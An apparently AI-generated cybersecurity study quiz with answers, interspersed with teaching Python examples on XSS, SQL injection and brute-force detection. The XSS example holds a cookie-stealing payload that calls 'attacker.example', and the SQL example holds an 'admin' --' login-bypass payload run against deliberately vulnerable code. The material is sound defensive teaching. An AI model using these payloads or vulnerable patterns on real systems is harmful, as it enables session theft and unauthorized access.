Used AI to generate questions based on each module's learning objectives, concepts, and keywords
This type of malware disguises itself as a legitimate program but provides unauthorized access to a system.
A. Worm
B. Ransomware
C. Trojan Horse
D. Adware
Trojan Horse
What Linux distribution is popular among ethical hackers for its built-in penetration testing tools?
A. Ubuntu
B. Kali Linux
C. Fedora
D. openSUSE
Kali Linux
An attacker injects code into a website that is later executed by users' browsers. What type of attack is this?
A. SQL Injection
B. Cross Site Scripting (XSS)
C. Denial of Service
D. Brute Force
Cross Site Scripting (XSS)
The process of overwhelming a system with requests to crash or degrade service is called what?
A. Spoofing
B. Social Engineering
C. DoS Attack
D. Port Scanning
DoS Attack
Which system is used to detect suspicious activity by analyzing network traffic, typically in real time?
A. IDS
B. SIEM
C. VPN
D. Proxy Server
IDS
This evidence-handling concept ensures that every person who touched the evidence is documented.
A. Rules of Evidence
B. Security Policy
C. Chain of Custody
D. Business Impact Analysis
Chain of Custody
Which platform allows virtual operating systems to run within another OS environment, useful for malware analysis?
A. Cold Site
B. Proxy Server
C. Virtual Machine
D. Load Balancer
Virtual Machine
Gaining access to a session token and impersonating a user is known as what?
A. Credential Stuffing
B. Phishing
C. Session Hijacking
D. SQL Injection
Session Hijacking
What type of site is prepped for use in a disaster but lacks live servers and data, requiring setup before use?
A. Warm Site
B. Hot Site
C. Cold Site
D. Live Site
Cold Site
This social engineering tactic involves convincing someone to give up information by pretending to be someone else over the phone.
A. Shoulder Surfing
B. Dumpster Diving
C. Pretext Calling
D. Reverse Engineering
Pretext Calling
What is the term for systematically extracting details such as usernames, shares, and running services from a target database or web service?
A. Data Extraction
B. Web Crawling
C. Port Forwarding
D. Enumeration
Enumeration
Which type of malware aims to disable antivirus programs or firewalls so that other malware can operate undetected?
A. RAT
B. Security Software Disabler
C. Backdoor
D. Wrapper
Security Software Disabler
A malicious actor posts a fake login screen on a trusted site to collect credentials. This is an example of what?
A. Phishing
B. Spoofing
C. Packet Sniffing
D. Footprinting
Phishing
What is the name of the plan that ensures critical functions continue during and after a disaster?
A. Incident Response Plan
B. Business Continuity Plan
C. Network Access Plan
D. Penetration Test Report
Business Continuity Plan
This type of detection system runs on the host machine and monitors internal behaviors.
A. NIDS
B. Firewall
C. HIDS
D. VPN
HIDS
When a web application fails to validate input properly, what kind of vulnerability does this lead to?
A. Brute Force
B. Input Tampering
C. Input Validation Vulnerability
D. API Spoofing
Input Validation Vulnerability
A deceptive message that urges users to download malware under the guise of security alerts is known as what?
A. Scareware
B. Ransomware
C. Spyware
D. Adware
Scareware
What is the term for a location that has live servers, updated data, and is ready to take over operations immediately in case of failure?
A. Cold Site
B. Hot Site
C. Warm Site
D. Disaster Clone
Hot Site
Which file system is commonly associated with older Windows systems and is still recognized in Linux environments?
A. NTFS
B. EXT4
C. FAT
D. HFS+
FAT
What kind of evidence consists of logs or captured traffic that directly shows the events of an intrusion?
A. Hearsay
B. Documentary
C. Direct Evidence
D. Physical Evidence
Direct Evidence
Which of the following is an attack where an attacker takes over a legitimate user’s session to gain unauthorized access?
A. SQL Injection
B. Session Hijacking
C. Packet Sniffing
D. Social Engineering
Session Hijacking
A “hot site” is a backup location with power and equipment but no live data or services. True or False
False
Which type of malware encrypts user files and demands payment to restore access?
A. Worm
B. Adware
C. Ransomware
D. Logic Bomb
Ransomware
What kind of social engineering attack involves watching someone type their password over their shoulder?
A. Shoulder Surfing
B. Dumpster Diving
C. Phishing
D. Covert Channeling
Shoulder Surfing
Which Linux GUI is commonly associated with KDE environments?
A. GNOME
B. Cinnamon
C. Plasma Desktop
D. MATE
Plasma Desktop
A web server that allows directory listing, uses default credentials, and has outdated software is likely suffering from what?
A. SQL Injection
B. Hardening Error
C. Web Server Misconfiguration
D. Vulnerability Scanning
Web Server Misconfiguration
What type of plan focuses specifically on restoring IT systems and data after a disaster?
A. Incident Response Plan
B. Business Continuity Plan
C. Security Audit
D. Disaster Recovery Plan
Disaster Recovery Plan
A botnet is a group of infected machines controlled by an attacker to perform coordinated actions like DDoS attacks. True or False
True
What kind of malware may allow persistent access and hides itself deeply within the system’s processes and drivers?
A. Spyware
B. Rootkit
C. Scareware
D. RAT
Rootkit
Which evidence classification involves real, tangible objects like a USB drive or a device used in the crime?
A. Hearsay
B. Documentary
C. Physical Evidence
D. Direct Evidence
Physical Evidence
Which protocol is typically used to encrypt web communication between browsers and servers?
A. FTP
B. SSL/TLS
C. SMTP
D. DNS
SSL/TLS
GNOME and Plasma are both command line interfaces commonly used in Linux. True or False
False
What tool is commonly used to detect vulnerabilities in web servers and applications?
A. VirtualBox
B. Nessus
C. Hydra
D. SQLRECON
Nessus
What kind of malware disguises itself as legitimate software to trick users into installing it?
A. Trojan Horse
B. Worm
C. Ransomware
D. Keylogger
Trojan Horse
Which phase of incident response involves figuring out how the attacker got in and what needs to be fixed?
A. Preparation
B. Containment
C. Eradication
D. Recovery
Eradication
This term refers to the legal and procedural process for protecting and managing digital evidence.
A. Chain of Custody
B. Due Diligence
C. Digital Rights Management
D. Cold Site
Chain of Custody
Which of the following is NOT a benefit of using Linux Live CDs?
A. Portability
B. No installation needed
C. Permanent storage of changes
D. Useful for forensic tasks
Permanent storage of changes
What type of detection system sits on the network perimeter and watches all inbound/outbound traffic?
A. HIDS
B. VPN
C. Proxy Server
D. NIDS
NIDS
A social engineering scam where the attacker builds trust with the victim before manipulating them is known as what?
A. Reverse Social Engineering
B. Baiting
C. Pretexting
D. Phishing
Pretexting
What’s the term for a planned, discussion-based exercise in which the team steps through an incident response or disaster recovery plan to validate it?
A. Live Fire
B. Red Teaming
C. Structured Walkthrough
D. Port Scan
Structured Walkthrough
What kind of attack involves injecting malicious code into a backend database through web forms or URL parameters?
A. Cross Site Scripting (XSS)
B. Session Hijacking
C. SQL Injection
D. Buffer Overflow
SQL Injection
A cold site is the most expensive and time critical option for disaster recovery. True or False
False
Which of the following allows attackers to redirect a URL to malicious content or steal credentials via a poisoned query string?
A. Input fuzzing
B. Port spoofing
C. URL poisoning
D. DNS tunneling
URL poisoning
What category of malicious software includes keystroke loggers, screen capture tools, and password stealers?
A. Adware
B. Spyware
C. Ransomware
D. Worms
Spyware
True or False: Enumeration is typically used during the reconnaissance phase to gather usernames, shares, and network services.
True
Which Linux distribution was developed specifically for digital forensics and penetration testing?
A. Ubuntu
B. Kali Linux
C. Fedora
D. Red Hat Enterprise
Kali Linux
Which evidence classification applies to log files and screenshots that directly show the events of an attack?
A. Physical Evidence
B. Documentary Evidence
C. Direct Evidence
D. Testimonial Evidence
Direct Evidence
This web vulnerability allows attackers to run malicious scripts in the victim's browser, often used to steal session cookies.
A. SQL Injection
B. DoS
C. Cross Site Scripting (XSS)
D. Phishing
Cross Site Scripting (XSS)
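The XSS cards above name the attack without showing it. The following is an added example (not code from the original study set): a tiny page renderer that pastes a search term straight into HTML, beside the hardened version that applies contextual output encoding. The attacker payloads and the `render_unsafe`/`render_safe` names are constructed for this illustration.

```python
import html
import re

# Constructed attacker payloads (illustrative; not taken from the original page).
# The first steals the session cookie by loading an image from an attacker host;
# the second breaks out of an attribute value and adds an event handler.
COOKIE_THEFT = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
ATTR_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'


def render_unsafe(term: str) -> str:
    # Deliberately vulnerable: the untrusted term is interpolated into HTML
    # as-is, so any markup it contains becomes part of the page.
    return f'<p>Results for: {term}</p><input value="{term}">'


def render_safe(term: str) -> str:
    # Contextual output encoding: html.escape with quote=True converts
    # < > & " and ' to entities, so the term can neither open a tag in text
    # context nor close the quoted attribute it is placed in.
    safe = html.escape(term, quote=True)
    return f'<p>Results for: {safe}</p><input value="{safe}">'


# Matches a raw <script tag or an on* event attribute with a real opening quote.
ACTIVE_MARKUP = re.compile(r'<script|\son\w+\s*=\s*"', re.IGNORECASE)


def contains_active_markup(page: str) -> bool:
    # Crude indicator used only to compare the two renderers: True means the
    # input was interpreted as markup that can run script in the browser.
    return ACTIVE_MARKUP.search(page) is not None


def demo() -> dict:
    return {
        "unsafe_script": contains_active_markup(render_unsafe(COOKIE_THEFT)),
        "safe_script": contains_active_markup(render_safe(COOKIE_THEFT)),
        "unsafe_attr": contains_active_markup(render_unsafe(ATTR_BREAKOUT)),
        "safe_attr": contains_active_markup(render_safe(ATTR_BREAKOUT)),
    }


if __name__ == "__main__":
    for name, hit in demo().items():
        print(f"{name}: {'VULNERABLE' if hit else 'ok'}")
```

Output encoding is the primary defence; marking the session cookie `HttpOnly` additionally keeps `document.cookie` from exposing it even if a script does run, which is why the "steal session cookies" outcome on the card depends on both controls being absent.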
A disaster recovery plan focuses on ensuring business operations continue without interruption during a crisis. True or False
False
Which of the following best describes a "logic bomb"?
A. Code that replicates and spreads automatically
B. Code that activates under specific conditions
C. A trojan that opens a backdoor
D. A worm that infects email attachments
Code that activates under specific conditions
What common security control allows or blocks traffic based on defined rules, and is typically deployed at network boundaries?
A. Firewall
B. SIEM
C. Proxy Server
D. Load Balancer
Firewall
Which malware attack disguises itself as a real file but contains hidden code to create a backdoor into a system?
A. Rootkit
B. Trojan Horse
C. RAT
D. Adware
Trojan Horse
The Plasma desktop is part of the GNOME project. True or False
False
What is the most appropriate response when malware is detected on a system and needs to be removed?
A. Report it and take no further action
B. Disconnect, isolate, and remediate
C. Immediately reboot the system
D. Upgrade the firewall rules
Disconnect, isolate, and remediate
This malware type operates without user knowledge and may redirect browsing, install other programs, or record activity.
A. RAT
B. Spyware
C. Backdoor
D. Exploit Kit
Spyware
Which incident response phase involves identifying how the breach occurred and removing any malware or unauthorized access?
A. Containment
B. Eradication
C. Recovery
D. Identification
Eradication
Which component of Linux acts as the core interface between applications and hardware?
A. GUI
B. Shell
C. Kernel
D. Daemon
Kernel
Social engineering attacks rely primarily on software flaws and technical exploits. True or False
False
What’s a common goal of input validation during web development?
A. Improve page loading speed
B. Allow flexible code execution
C. Prevent injection attacks
D. Help search engines crawl better
Prevent injection attacks
Which of the following threats is most associated with cloud computing environments?
A. Keylogging
B. Ransomware
C. Multi-tenancy risks
D. Boot sector corruption
Multi-tenancy risks
Which term refers to unauthorized access to a network by leveraging weak authentication mechanisms or guessing login credentials?
A. Brute Force Attack
B. Cross-Site Request Forgery
C. Port Scanning
D. SQL Injection
Brute Force Attack
A warm site includes updated hardware, software, and real time mirrored data for immediate failover. True or False
False
Which of the following is a key benefit of using a virtual machine in penetration testing?
A. Increased physical security
B. Greater RAM capacity
C. Easy snapshot rollback
D. Hardware level keylogging protection
Easy snapshot rollback
What security concept ensures that multiple layers of protection are in place, such as firewalls, IDS/IPS, and endpoint controls?
A. Least Privilege
B. Defense in Depth
C. Privilege Escalation
D. Security through Obscurity
Defense in Depth
This type of attack sends ICMP echo requests to a network's broadcast address with the victim's spoofed source address, so that every host's reply floods the target.
A. DNS Spoofing
B. Smurf Attack
C. SYN Flood
D. Poison Null Byte Attack
Smurf Attack
Which type of malware allows remote control of a victim’s machine and is often used in botnet attacks?
A. RAT (Remote Access Trojan)
B. Logic Bomb
C. Worm
D. Polymorphic Virus
RAT (Remote Access Trojan)
A “zero day” vulnerability refers to a publicly disclosed exploit that already has a patch available. True or False
False
What kind of evidence is derived from personal observation or direct testimony of a witness?
A. Testimonial Evidence
B. Hearsay
C. Direct Evidence
D. Documentary Evidence
Testimonial Evidence
Which incident response phase is concerned with limiting the spread and impact of an active security incident?
A. Containment
B. Recovery
C. Eradication
D. Detection
Containment
What’s the main purpose of a “honeypot” in a network security environment?
A. Block traffic from malicious IPs
B. Encrypt traffic before it leaves the LAN
C. Attract and trap attackers for analysis
D. Improve data throughput
Attract and trap attackers for analysis
What does HIPAA primarily regulate?
A. Financial records
B. Social media content
C. Protected health information
D. Password encryption practices
Protected health information
A logic bomb spreads automatically to other machines on the network like a worm. True or False
False
Which of the following tools is used for database scanning and assessment?
A. Scuba
B. Hydra
C. Nessus
D. Metasploit
Scuba
What method is used by attackers to trick users into believing they’re interacting with a trusted site, when they are not?
A. Phishing
B. Keylogging
C. URL Filtering
D. Enumeration
Phishing
Which web vulnerability takes advantage of input fields that aren’t properly sanitized, allowing attackers to run unauthorized queries?
A. Cross Site Request Forgery
B. SQL Injection
C. XSS
D. Enumeration
SQL Injection
Which security standard is specifically focused on protecting cardholder data for organizations that handle credit card payments?
A. HIPAA
B. NIST 800 53
C. PCI DSS
D. GLBA
PCI DSS
In a structured walkthrough, the response team simulates a real incident to test their plans and procedures. True or False
False
What is a common symptom of a denial of service (DoS) attack?
A. Excessive CPU usage
B. System patch failure
C. Users receiving spam email
D. Sudden password changes
Excessive CPU usage
What does the acronym “IaaS” stand for in cloud computing?
A. Internet as a Service
B. Interface and Application Services
C. Infrastructure as a Service
D. Internal Authentication and Security
Infrastructure as a Service
What kind of network attack targets services by overwhelming them with traffic from multiple sources simultaneously?
A. Brute Force Attack
B. DDoS
C. Logic Bomb
D. Port Knocking
DDoS
What term describes a security policy where all access is denied unless explicitly allowed?
A. Open Policy
B. Least Privilege
C. Implicit Deny
D. Zero Trust
Implicit Deny
“Dumpster diving” is a form of technical reconnaissance used to exploit software vulnerabilities. True or False
False
Which plan is used to guide actions and communication during a cyberattack or system compromise?
A. Risk Assessment Plan
B. Incident Response Plan
C. Disaster Recovery Plan
D. Penetration Testing Agreement
Incident Response Plan
What kind of evidence is gathered from data sources like system logs, network captures, and audit trails?
A. Testimonial Evidence
B. Physical Evidence
C. Documentary Evidence
D. Analog Evidence
Documentary Evidence
What type of backup site is partially configured and can become fully operational with limited setup time?
A. Cold Site
B. Warm Site
C. Hot Site
D. Shadow Site
Warm Site
Which type of malware spreads itself across a network without any user interaction?
A. Trojan Horse
B. Ransomware
C. Worm
D. RAT
Worm
What is the term for using deception or impersonation to gain sensitive information from people?
A. Malware
B. Social Engineering
C. Credential Stuffing
D. Port Scanning
Social Engineering
A port redirection attack sends incoming network traffic to a different port than originally intended. True or False
True
Which of the following would be considered a benefit of using a Live CD during forensics or incident response?
A. Allows permanent OS changes
B. Prevents contamination of host system
C. Requires less CPU power
D. Automatically patches vulnerabilities
Prevents contamination of host system
Which Linux distro is known for its stability and popularity in enterprise server environments?
A. Arch Linux
B. Red Hat Enterprise Linux
C. Manjaro
D. Kali Linux
Red Hat Enterprise Linux
This security tool intercepts and inspects HTTP traffic between a browser and the web server.
A. Metasploit
B. Burp Suite
C. Scuba
D. Nessus
Burp Suite
A worm is a type of malware that hides itself inside another legitimate file or application. True or False
False
Which concept involves restricting users to only the data or systems needed to perform their job?
A. Role-Based Execution
B. Least Privilege
C. Defense in Depth
D. Implicit Deny
Least Privilege
Which kind of social engineering attack uses fake alerts to frighten users into downloading malware?
A. Spear Phishing
B. Smishing
C. Scareware
D. Pretexting
Scareware
Which of the following is not typically a function of an Intrusion Detection System (IDS)?
A. Alerting on suspicious activity
B. Logging potential threats
C. Automatically blocking malicious traffic
D. Monitoring network packets
Automatically blocking malicious traffic
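Two cards above concern a brute-force attack (guessing login credentials) and the point that an IDS alerts and logs but does not block. The following is an added example (not part of the original study set) that ties them together: a small detector that reads SSH-style authentication log lines, counts failed logins per source address inside a sliding time window, and raises an alert when a threshold is reached. The log lines, the RFC 5737 documentation addresses in them, and the function names are constructed for this illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd-style log lines (illustrative sample, not a real capture).
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[101]: Failed password for invalid user admin from 203.0.113.7 port 51000 ssh2
2024-05-01T10:00:03 sshd[102]: Failed password for root from 203.0.113.7 port 51001 ssh2
2024-05-01T10:00:04 sshd[103]: Accepted password for alice from 198.51.100.5 port 40000 ssh2
2024-05-01T10:00:06 sshd[104]: Failed password for root from 203.0.113.7 port 51002 ssh2
2024-05-01T10:00:08 sshd[105]: Failed password for invalid user test from 203.0.113.7 port 51003 ssh2
2024-05-01T10:00:09 sshd[106]: Failed password for root from 203.0.113.7 port 51004 ssh2
2024-05-01T10:00:20 sshd[107]: Failed password for bob from 198.51.100.5 port 40001 ssh2
2024-05-01T10:05:00 sshd[108]: Failed password for root from 203.0.113.7 port 51005 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line: str):
    """Return (timestamp, result, user, source_ip) or None for lines we don't understand."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]


def detect_bruteforce(log_text: str, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Return one alert (src, time, failures_in_window) per source the first
    time it reaches `threshold` failed logins within a sliding `window`.

    Detection only: like an IDS this records and alerts; it never blocks the
    source. Blocking would be the job of a firewall or IPS fed by these alerts.
    """
    recent = defaultdict(deque)   # src ip -> timestamps of recent failures
    alerted = set()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, _user, src = parsed
        if result != "Failed":
            continue
        q = recent[src]
        q.append(ts)
        # Drop failures that fell out of the window so old noise cannot trigger alerts.
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, ts.isoformat(), len(q)))
    return alerts


if __name__ == "__main__":
    for src, when, n in detect_bruteforce(SAMPLE_LOG):
        print(f"ALERT possible brute force: {n} failed logins from {src} by {when}")
```

In the sample, 203.0.113.7 reaches five failures within nine seconds and is flagged once; 198.51.100.5 has a single failure and is not. The isolated failure at 10:05:00 falls outside the window and does not re-alert, which is the behaviour you want before wiring such a rule into a SIEM.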
What database attack targets improperly filtered characters to exploit backend query logic?
A. XSS
B. SQL Injection
C. URL Spoofing
D. DDoS
SQL Injection
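The SQL injection cards (and the input validation card answered "Prevent injection attacks") describe the attack only in words. The following is an added example, not code from the original study set: a login check that concatenates user input into a query, the parameterised version that is immune to the same payload, and an allowlist validator that rejects the payload before it ever reaches the database. The in-memory user table, the credentials in it, and the function names are constructed for this illustration.

```python
import re
import sqlite3

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def build_db() -> sqlite3.Connection:
    # Constructed in-memory table with two illustrative accounts.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct horse"), ("admin", "hunter2")],
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Deliberately vulnerable: the input is spliced into the SQL text, so a
    # single quote ends the string literal and the rest is parsed as SQL.
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    (count,) = conn.execute(query).fetchone()
    return count > 0


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the values travel separately from the statement,
    # so nothing in them can change the query's structure.
    (count,) = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return count > 0


def is_valid_username(username: str) -> bool:
    # Allowlist input validation: only letters, digits and underscore.
    # This is a second layer; parameterised queries remain the primary fix.
    return USERNAME_RE.match(username) is not None


def demo() -> dict:
    conn = build_db()
    # Classic payload: closes the username literal, then "--" comments out
    # the password check, so the query becomes
    #   ... WHERE username = 'admin' --' AND password = 'wrong'
    payload = "admin' --"
    return {
        "vulnerable_bypassed": vulnerable_login(conn, payload, "wrong"),
        "safe_bypassed": safe_login(conn, payload, "wrong"),
        "safe_legit": safe_login(conn, "admin", "hunter2"),
        "payload_passes_validation": is_valid_username(payload),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The "improperly filtered characters" on the card are the quote and comment sequence in the payload; parameterisation removes the need to filter them at all, while the allowlist check gives defence in depth and a clean place to log rejected input.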
A “hot site” is ready to go immediately, with up-to-date data and minimal setup required. True or False
True
What is the purpose of the “eradication” phase in incident response?
A. Reporting incident to stakeholders
B. Testing for vulnerabilities
C. Removing malware and closing exploited vulnerabilities
D. Creating new policies
Removing malware and closing exploited vulnerabilities
What is the first phase of a formal incident response plan?
A. Detection
B. Identification
C. Preparation
D. Containment
Preparation
A device or software that acts as an intermediary for requests from clients seeking resources from other servers is known as a:
A. Proxy Server
B. IDS
C. Firewall
D. Honeypot
Proxy Server